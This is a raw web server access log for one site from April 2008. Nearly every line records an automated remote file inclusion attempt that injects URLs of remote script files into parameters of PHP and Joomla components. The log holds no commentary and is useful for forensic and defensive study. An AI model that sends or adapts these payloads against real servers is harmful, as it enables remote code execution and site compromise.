91.188.211.28 - - [30/Apr/2008:12:07:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:07:40 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.88.4.5 - - [30/Apr/2008:12:07:43 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [30/Apr/2008:12:07:43 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [30/Apr/2008:12:07:44 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.77.9.141 - - [30/Apr/2008:12:07:53 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:07:53 -0700] "GET /logs/module_db.php?pivot_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.32.223 - - [30/Apr/2008:12:07:54 -0700] "GET /module_db.php?pivot_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [30/Apr/2008:12:07:54 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.35.158.180 - - [30/Apr/2008:12:07:55 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:12:08:03 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://contactcraze.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:12:08:33 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:12:08:33 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [30/Apr/2008:12:08:34 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.130.26 - - [30/Apr/2008:12:08:37 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:08:46 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:08:46 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:08:47 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [30/Apr/2008:12:08:47 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.teploobmen.ru/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:12:08:48 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.98.208.86 - - [30/Apr/2008:12:08:48 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.brokencomplex.com/phpBB/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:08:48 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:08:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:12:08:58 -0700] "GET /logs/access_080201.log/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:12:08:59 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:12:08:59 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.78.135 - - [30/Apr/2008:12:09:09 -0700] "GET /logs/access_080211.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mittweida.biz/images/.../pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:09:26 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:09:36 -0700] "GET /logs/access_080131.log//?php=paginahttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:09:37 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:09:37 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:09:40 -0700] "GET //?php=paginahttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:09:42 -0700] "GET /logs//?php=paginahttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 200 45416 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:09:49 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:09:51 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:09:51 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:09:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:09:53 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:10:10 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:10:11 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:12 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:12 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:13 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [30/Apr/2008:12:10:14 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:12:10:25 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://contactcraze.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [30/Apr/2008:12:10:25 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://contactcraze.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:26 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:27 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:30 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:31 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:10:31 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.184.148 - - [30/Apr/2008:12:10:42 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.148 - - [30/Apr/2008:12:10:42 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:10:49 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:10:49 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:10:56 -0700] "GET /logs/access_080215.log//?php=inchttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:11:00 -0700] "GET //?php=inchttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:11:00 -0700] "GET /logs//?php=inchttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 45416 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:11:07 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:11:08 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:11:08 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:11:10 -0700] "GET /logs/access_080131.log//?php=paginahttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:11:11 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:11:14 -0700] "GET //?php=paginahttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:11:14 -0700] "GET /logs/access_080215.log//?php=inchttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.141.229.9 - - [30/Apr/2008:12:11:15 -0700] "GET /logs//?php=paginahttp://kozhevatov.ru/board/.../id/id.txt?? HTTP/1.1" 200 45416 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:11:20 -0700] "GET /logs//?php=inchttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 45416 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:11:21 -0700] "GET //?php=inchttp://216.139.236.19/cache/arab.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:11:26 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:11:26 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:12:11:29 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:12:11:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:11:38 -0700] "GET /logs/access_080223.log/index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:12:11:38 -0700] "GET /logs/access_080226.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:11:39 -0700] "GET /index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [30/Apr/2008:12:11:40 -0700] "GET /logs/index2.php?page=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:12:07 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.12.40 - - [30/Apr/2008:12:12:07 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.199.73 - - [30/Apr/2008:12:12:18 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.joomla.teafree.pl/editor/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:12:19 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:12:19 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:13:16 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:13:16 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:13:16 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:12:13:17 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:12:13:18 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:12:13:19 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.192.226 - - [30/Apr/2008:12:13:19 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://auktiontips.com/images/stories/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.72.181.15 - - [30/Apr/2008:12:13:20 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:13:22 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:13:22 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:13:28 -0700] "GET /logs//selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:13:28 -0700] "GET //selectlang.php?BBC_LANGUAGE_PATH=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:13:57 -0700] "GET /logs/access_080205.log/main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:13:57 -0700] "GET /main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:13:57 -0700] "GET /logs/main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.158.150 - - [30/Apr/2008:12:14:01 -0700] "GET /logs/access_080225.log/main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.63.9.163 - - [30/Apr/2008:12:14:03 -0700] "GET /logs/access_071225.log//spaw_control.class.php?spaw_root=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:12:14:05 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [30/Apr/2008:12:14:06 -0700] "GET /lostpasswd.php?env[include_prefix]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.51.143.59 - - [30/Apr/2008:12:14:22 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:14:32 -0700] "GET /logs/access_080205.log/main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:14:32 -0700] "GET /main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:14:32 -0700] "GET /logs/main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:14:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:14:40 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [30/Apr/2008:12:14:43 -0700] "GET /logs/access_080225.log/main.php?appserv_root=http://216.139.236.19/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:14:43 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [30/Apr/2008:12:14:43 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:14:52 -0700] "GET /logs/access_080215.log//?php=inchttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:14:56 -0700] "GET //?php=inchttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.200.113.18 - - [30/Apr/2008:12:14:57 -0700] "GET /logs//?php=inchttp://sulawesi.us/xpl/z.txt?? HTTP/1.1" 200 45416 "-" "libwww-perl/5.805" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:12:14:58 -0700] "GET /logs/module_db.php?pivot_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.188.211.28 - - [30/Apr/2008:12:14:58 -0700] "GET /module_db.php?pivot_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:14:59 -0700] "GET /logs/access_080212.log/avatar.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:15:02 -0700] "GET /avatar.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [30/Apr/2008:12:15:05 -0700] "GET /logs/avatar.php?page=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:15:32 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [30/Apr/2008:12:15:33 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://gtacrime.nl/a/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
